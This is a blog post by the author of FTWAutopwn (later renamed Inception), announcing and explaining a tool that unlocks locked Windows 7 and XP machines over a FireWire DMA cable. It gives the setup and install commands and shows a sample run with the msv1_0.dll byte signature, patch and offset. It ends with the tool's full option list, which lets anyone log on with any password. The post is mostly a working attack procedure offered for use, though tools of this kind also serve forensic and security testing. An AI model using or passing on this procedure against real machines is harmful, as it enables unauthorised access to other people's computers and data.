Update: FTWAutopwn is now named Inception: I’ve created a standalone page for the tool here, please be referred to that page for updates on the tool.
The last days I’ve been working on an alternative to winlockpwn (unlocking locked Windows boxes through FireWire SBP2 DMA) using libforensic1394. Now I’ve released an alpha version of the tool, Fire Through the Wire Autopwn (FTWAutopwn) at github. So here’s how to use it:
Check that your distro uses the new IEEE1394 stack
$ ls /dev | grep fw
If the new stack is loaded and the system has at least one FireWire port then `fw0` should be printed. Additional ports/devices will take the form fw<n>. If no devices are listed then it is likely that the new stack is not loaded. That sucks, try this command if you’re running Debian/Ubuntu:
sudo modprobe -r ohci1394 sbp2 eth1394 dv1394 raw1394 video1394 sudo modprobe firewire-ohci
Download and install libforensic1394
sudo apt-get install git cmake python3 wget https://freddie.witherden.org/tools/libforensic1394/releases/libforensic1394-0.2.tar.gz tar xvf libforensic1394-0.2.tar.gz cd libforensic1394-0.2 mkdir build cd build cmake -G"Unix Makefiles" ../ make sudo make install cd ../python sudo python3 setup.py install
Download and use FTWAutopwn
cd git clone https://github.com/carmaa/FTWAutopwn.git cd FTWAutopwn python3 ftwautopwn.py
The last command should now work. Hook up your attacking machine to a locked Windows 7 or XP machine using IEEE1394 FireWire cable, and run the above command. Select the correct target, and you’re off!
$ python3 ftwautopwn.py Fire Through the Wire Autopwn v.0.0.1 by Carsten Maartmann-Moe <[email protected]> 2011 For updates, check out https://github.com/carmaa/FTWAutopwn [+] Available targets:  Win7 32-bit msv1_0.dll technique  Win7 64-bit msv1_0.dll technique  WinXP SP2 msv1_0.dll technique  WinXP SP3 msv1_0.dll technique Please select target: 4 [+] You have selected: WinXP SP3 msv1_0.dll technique Using signature: 83f8107511b0018b Using patch: 83f8109090b0018b Using offset: 2146 [+] Searching for signature, 12 MiB so far. [+] Signature found at 0xd7d862. [+] Write-back verified; patching successful. Bon voyage!
You should now be able to log onto your target machine with any password.
Full syntax is provided by using the -h/–help switch:
$ python3 ftwautopwn.py -h Fire Through the Wire Autopwn v.0.0.1 by Carsten Maartmann-Moe <[email protected]> 2011 For updates, check out https://github.com/carmaa/FTWAutopwn Usage: ftwautopwn [OPTIONS] -d --delay=TIME: Delay attack by TIME seconds. This is useful in order to guarantee that the target machine has successfully installed the SBP2 device before attacking. If the attack fails, try to increase this value. -f --file=FILE: Use a file instead of FireWire bus data as input; for example to facilitate attacks on VMware machines or to ease testing and signature generation efforts -h, --help: Displays this message -l, --list: Lists available target operating systems -n, --no-write: Dry run, do not write back to memory -t TARGET, --target=TARGET: Specify target operating system (use --list to list available targets) -v/--verbose: Verbose mode